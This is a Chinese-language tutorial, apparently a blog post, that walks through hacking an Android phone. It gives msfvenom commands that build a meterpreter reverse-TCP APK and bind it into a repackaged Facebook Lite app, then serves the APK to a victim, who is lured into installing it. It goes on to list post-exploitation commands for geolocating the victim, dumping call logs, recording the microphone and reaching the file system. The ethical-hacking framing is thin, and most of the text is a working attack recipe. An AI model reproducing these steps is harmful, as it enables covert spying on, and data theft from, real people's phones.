在数字时代,移动电话已成为我们日常生活中不可或缺的一部分,充当个人助理、通信设备和互联网网关。然而,它们提供的便利也伴随着安全漏洞的风险。
什么是手机黑客?这是指未经授权的访问、操纵或利用移动设备及其数据。手机黑客攻击的各个方面,包括黑客使用的方法,包括但不限于恶意软件、网络钓鱼、网络攻击和社会工程。
- 恶意软件:旨在渗透、破坏或未经授权访问计算机系统(包括移动设备)的恶意软件。示例包括病毒、蠕虫、特洛伊木马和间谍软件。
- 网络钓鱼:一种网络攻击方法,通过在电子通信中伪装成值得信赖的实体,诱骗个人泄露敏感信息,例如用户名、密码或财务数据。
- 中间人 (MitM) 攻击:一种网络攻击,攻击者在不知情的情况下拦截并可能改变两方之间的通信。这可以在网络环境中执行,包括 Wi-Fi 连接。
- 社会工程:通常通过心理操纵而不是技术手段操纵个人泄露机密信息或执行危害安全的行为。
在本次实际演示中,我们利用了针对Android设备的恶意软件和网络钓鱼技术的有效组合。然后,我们将使用msfvenom制作一个恶意应用程序,并有策略地诱使受害者下载并安装它。这种欺骗性的策略使我们能够完全访问和控制他们的手机,这表明成为此类网络威胁受害者的严重后果。
实验室设置
首先,我们必须在 kali Linux 上建立我们的移动黑客实验室。
为了对 Android 设备和应用程序进行评估,我们需要真实的或模拟的 Android 设备。
在本次实践中,我们使用了真实设备,但这里有一个公会来安装Genymotion一个 Android 模拟器,它具有一整套传感器和功能,以便与虚拟 Android 环境进行交互。
为了正确下载这个应用程序并将其安装在我们的kali linux上,我们访问了Genymotion官方网站下载页面
要安装,我们导航到下载文件的目录并运行以下命令。
执行并记下系统上的此目录。
我们还安装virtualbox和adb
要运行 genymotion,我们导航到上面突出显示的目录。
并运行,应用程序应该弹出。
我们通过单击此处创建了一个帐户。
我们被重定向到此页面。
接下来我们登录选择这个选项
终于启动并运行了
现在让我们添加一个设备
全部点击下一步
安装
我们的虚拟电话已启动并正在运行。
我们现在需要做的就是使用msfvenom生成恶意应用程序并将其发送给受害者。
生成我们的有效负载
msfvenom是 Metasploit 框架中的一个强大工具,Metasploit 框架是一个广泛使用的渗透测试和利用工具包。msfvenom允许安全专业人员和道德黑客为各种攻击生成自定义有效负载。这些有效负载可以针对各种平台和目的而设计,包括远程代码执行、shell 访问等。
该工具允许用户指定有效负载类型、编码技术、输出格式和其他参数,从而提供了制作有效负载的灵活性。
我们使用以下命令使用msfvenom创建恶意APK
sudo msfvenom -platform android -a java -p android/meterpreter/reverse_tcp LHOST=<攻击者IP> LPORT=<端口> -f raw -omale.apk
获取我们的攻击者IP
将我们的有效负载与 Facebook Lite 绑定
我在这里从 apkpure 下载了 Facebook Lite APK。
我们使用以下命令将APK绑定到payload
sudo msfvenom --platform android -a java -p android/meterpreter/reverse_tcp -x Facebook_Lite_401.0.0.14.110_Apkpure.apk LHOST=Atacker_IP LPORT=端口 -omaleFB.apk
服务和下载 发送应用程序
我们可以使用各种方法将应用程序发送给受害者,这里我们使用一个简单的 python http 服务器来为应用程序提供服务。
通过受害者浏览器下载恶意应用程序。
截至 2024 年 4 月 4 日,我们的恶意应用程序通过了所有 Android 安全检查。
获取受害者的电话
为此,我们将使用 msfconsole 来设置反向 shell 处理程序和必要的参数。
现在我们通过单击 MainActivity apk 在 Android 手机上启动该应用程序。
繁荣!我们在受害者的手机上安装了 meterpreter shell!
获取有关远程系统的信息,例如我们运行的操作系统;
获取我们运行时服务器正在运行的用户;获取用户ID
我们使用help命令来查看可以在目标上运行的所有可能的命令。
要检查设备是否已取得 root 权限或越狱,我们运行check_root。
我们还使用geolocate命令来查看设备的当前位置
我们使用dump_calllog命令检索受害者的所有通话记录
我们还可以通过运行webcam_list查看设备有多少个网络摄像头。
我们还使用 record_mic 命令来窃听用户。
文件系统访问
我们有完整的文件系统,我们可以上传文件、下载文件和读取文件内容,如下所示;
暂无评论内容